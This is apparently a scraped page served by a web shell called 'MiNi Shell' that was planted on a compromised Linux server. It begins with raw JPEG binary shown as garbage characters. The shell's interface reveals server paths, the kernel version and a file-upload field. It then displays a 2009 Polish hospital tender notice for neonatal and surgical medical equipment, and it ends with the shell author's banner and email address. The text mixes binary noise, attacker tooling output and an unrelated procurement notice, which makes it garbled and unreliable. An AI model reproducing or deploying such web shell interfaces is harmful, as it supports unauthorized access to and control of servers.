JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42776-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Dostawa urządzeń medycznych oraz innego sprzętu.</b><br>
<b>Numer ogłoszenia: 42776 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Uniwersytecki Nr 2 im. dr Jana Biziela w Bydgoszczy , ul. Ujejskiego 75, 85-168 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3655352, 3655521, 3655296, faks 052 3655752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biziel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń medycznych oraz innego sprzętu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż oraz uruchomienie fabrycznie nowych urządzeń medycznych oraz innego sprzętu w zakresie niżej wymienionych zadań:Zadanie 1.    Pompy infuzyjne - Pompa infuzyjna strzykawkowa dla noworodków - 18 kpl. 
Zadanie 2.    Wagi precyzyjne - Waga dla noworodków - 4 kpl.  
Zadanie 3.    Lampy ultrafioletowe - Lampa statywowa do fototerapii noworodka - 3 kpl.  
Zadanie 4.    Pompa do użytku medycznego - Ssak elektryczny jednobutlowy - 5 kpl. 
Zadanie 5.    Różne urządzenia i produkty medyczne  - Inhalator do terapii aerozolowej - 4 kpl.
Zadanie 6.    Namioty tlenowe - Namiot tlenowy- 3 kpl. 
Zadanie 7.    Urządzenie diagnostyczne -Urządzenie do pomiaru zwiotczenia mięśni -1 kpl.
Zadanie 8.    Materace  - Materac grzewczy - 3 kpl.
Zadanie 9.    Urządzenia i przyrządy używane na salach operacyjnych -  Wózek leżący do przewożenia  pacjentów na sale operacyjne - 8 kpl. 
Zadanie 10.   Chłodziarki - Witryna chłodnicza - 2 kpl. 
także przeszkolenie personelu użytkownika w zakresie obsługi urządzeń, przeszkolenie  personelu  technicznego w zakresie konserwacji i podstawowych przeglądów technicznych urządzeń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0, 38.31.00.00-1, 31.51.50.00-9, 42.12.24.10-7, 33.19.00.00-8, 33.15.73.00-8, 33.12.41.00-6, 39.14.31.12-4, 33.16.20.00-3, 39.71.11.30-9, 33.19.41.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 25.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:	
-Wykonawcy muszą spełnić wymagania ustawy Prawo zamówień publicznych oraz specyfikacji istotnych warunków zamówienia.
-Wykonawcy muszą spełniać wymagania określone w art. 22 ust.1 Prawo zamówień  publicznych tzn. że:a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznymi i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ustawy  Prawo zamówień publicznych.
-Oferowany przedmiot zamówienia musi spełnić wymagania ustawy o wyrobach medycznych - dotyczy zadania 1,2,3,4,5,6,7,8,9.
Opis sposobu dokonywania oceny spełnienia warunków:
Ocena spełnienia warunków wymaganych od wykonawców dokonana zostanie według formuły spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w ogłoszeniu o zamówieniu, oraz wyszczególnionych w rozdziale III specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Zamawiający wymaga, aby Wykonawcy dostarczyli następujące dokumenty:
1.1.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2.	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.3.	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.4.	          aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.5.	Wykonawca na oferowany przedmiot zamówienia, załączy aktualne dokumenty potwierdzające dopuszczenie do obrotu i do używania zgodnie z ustawą z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.)- tzn: wpis/zgłoszenie do Rejestru Wyrobów Medycznych i/lub certyfikat CE - dotyczy zadania:                         1,2,3,4,5,6,7,8,9,
1.6	Wykonawca na oferowany przedmiot zamówienia, załączy aktualne  dokumenty potwierdzające dopuszczenie do obrotu i do używania -   tzn: deklaracje zgodności - dotyczy zadania 10.
2. Wymagane oświadczenia:
2.1.oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych
2.2.oświadczenie z art. 24 ustawy Prawo zamówień publicznych
UWAGA:
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa  w pkt. 1 ppkt. 1.1., 1.2., 1.4., składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:     a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.b)	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.     d)składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.Jeżeli w kraju pochodzenia osoby lub w kraju, w który Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. a, b, c, d, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biziel.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w Samodzielnej Sekcji Zamówień Publicznych i Zaopatrzenia - lok nr  40 lub za pobraniem pocztowym lub przy udziale firmy kurierskiej( plus koszty przesyłki) Cena SIWZ - 10 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego przy ul. Ujejskiego 75 w Kancelarii Szpitala lok nr 46A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko - Pomorskiego na lata 2007 - 2013.
Miejsce i termin otwarcia ofert:
W siedzibie Zamawiającego przy ul. Ujejskiego 75 w świetlicy - niski parter, w dniu 06.03.2009 r. o godz. 12:00.
tel: (0-52) 36-55-495, 36-55-352   fax: (0-52)  36-55-752. NIP 9532582266.             REGON: 340517145.  Strona internetowa  Zamawiającego: www.biziel.pl.  e-mail -  przetargi@biziel.pl.Godziny urzędowania: od poniedziałku -  piątku w godzinach od 7:30 do 15:00.Nr referencyjny nadany sprawie: NZZ/04/D/09.
Osoby uprawnione do kontaktu z wykonawcami:
Cezary Kobziakowski- Dział Administracyjno -  Techniczny - nr tel: (052) 36-55-500.Jacek Uchański - Blok Operacyjny - nr tel: (052) 36-55-491.Dorota Arszyńska-Łopatka - Oddział Anestezjologii i Intensywnej Terapii - nr tel:(052) 36-55-279.Piotr Korbal - Oddział Noworodków, Wcześniaków z Intensywną Terapią Noworodka - nr tel: (052) 36-55-228.Przemysław Ściesiński - Samodzielna Sekcja Zamówień Publicznych i Zaopatrzenia - nr tel: (052) 36-55-495.Marek Bryk - Samodzielna Sekcja Zamówień Publicznych i Zaopatrzenia - nr tel: (052) 36-55-352.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
Zamawiający nie przewiduje  zamówień uzupełniających.    
Oferty należy składać w odniesieniu do jednej lub więcej części..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pompy infuzyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pompy infuzyjne - Pompa infuzyjna strzykawkowa dla noworodków - 18 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wagi precyzyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wagi precyzyjne - Waga dla noworodków - 4 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.31.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Lampy ultrafioletowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampy ultrafioletowe - Lampa statywowa do fototerapii noworodka - 3 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.51.50.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pompa do użytku medycznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pompa do użytku medycznego - Ssak elektryczny jednobutlowy - 5 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.12.24.10-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Różne urządzenia i produkty medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Różne urządzenia i produkty medyczne  - Inhalator do terapii aerozolowej - 4 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Namioty tlenowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Namioty tlenowe - Namiot tlenowy- 3 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.73.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Urządzenie diagnostyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie diagnostyczne -Urządzenie do pomiaru zwiotczenia mięśni -1 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Materace.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materace  - Materac grzewczy - 3 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Urządzenia i przyrządy używane na salach operacyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenia i przyrządy używane na salach operacyjnych -  Wózek leżący do przewożenia  pacjentów na sale operacyjne - 8 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Chłodziarki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chłodziarki - Witryna chłodnicza - 2 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.30-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com